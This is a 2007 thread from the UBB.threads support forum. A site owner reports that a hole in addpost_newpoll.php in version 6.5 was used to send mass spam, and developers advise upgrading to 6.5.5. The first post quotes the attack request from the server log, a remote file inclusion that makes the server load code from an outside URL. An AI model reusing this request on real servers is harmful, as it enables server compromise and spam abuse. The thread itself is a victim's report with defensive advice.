Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online Now
2 registered members (M4TT, isaac), 50 guests, and 263 spiders.
Key: Admin, Global Mod, Mod
Member Spotlight
Ruben
Ruben
Lutz,FL
Posts: 5,824
Joined: December 2003
Show All Member Profiles 
Top Posters(30 Days)
Gizmo 15
FREAK 11
M4TT 11
Ruben 5
mmkk 5
isaac 4
Latest Photos
Chinese Buddhist temple.
My buddha beads.
Rendered Walls
Multi-Screen wallpaper
Stockholm Metro
Previous Thread
Next Thread
Print Thread
extreme security bug used to send ou 100.000s of spam emails #194771
08/21/07 03:34 AM
08/21/07 03:34 AM
Joined: Aug 2007
Posts: 1
W
wnedoe Offline OP
stranger
wnedoe  Offline OP
stranger
W
Joined: Aug 2007
Posts: 1
I use version 6.5

My provider informed me that the UBBT script addpost_newpoll.php
was used to send ou more than 100.000 spam emails and nearly cancelled my contract.

It seems that this is a well known bug at least to spammers as they had even programmed a complete USER INTERFACE for sending spam with UBBt and so probably millions of spam emails are sent out each day with he help of ubbt.

The way this script is/was abused

/forum//addpost_newpoll.php?addpoll=preview&thispath=http://geocities.com/uza_mere/uza.txt? HTTP/1.1" 200

(the abuse script has gone at this place but is probably to be found at a lot of places elsewhere

Re: extreme security bug used to send ou 100.000s of spam emails [Re: wnedoe] #194772
08/21/07 04:19 AM
08/21/07 04:19 AM
Joined: Jun 2006
Posts: 16,785
Portland, OR; USA
Gizmo Offline
UBB.threads Developer
Gizmo  Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 16,785
Portland, OR; USA
Are you running 6.5? If so, security issues are well known in builds prior to 6.5.5, you should consider upgrading.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: extreme security bug used to send ou 100.000s of spam emails [Re: Gizmo] #194779
08/21/07 09:55 AM
08/21/07 09:55 AM
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
R
Rick Offline
Former Developer
Rick  Offline
Former Developer
R
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
Yes, we sent out an email to all of our customers when we were made aware of this and had a patch out to fix it. You should definitely at least upgrade to 6.5.5 at the minimum.


Shout Box
Today's Birthdays
No Birthdays
Recent Topics
Users Unable to Upload Avatar
by M4TT. 12/13/17 08:51 AM
Shout Box Sound Effect
by M4TT. 11/29/17 08:28 PM
Ad island
by TGCsanderson. 11/25/17 06:41 PM
Taking to long to connect to DB
by AstroCat. 11/24/17 12:34 PM
Forum Statistics
Forums36
Topics35,015
Posts190,534
Members12,045
Most Online978
Jun 24th, 2007
Random Image
Powered by UBB.threads™ PHP Forum Software 7.6.1
(Snapshot build 20171106)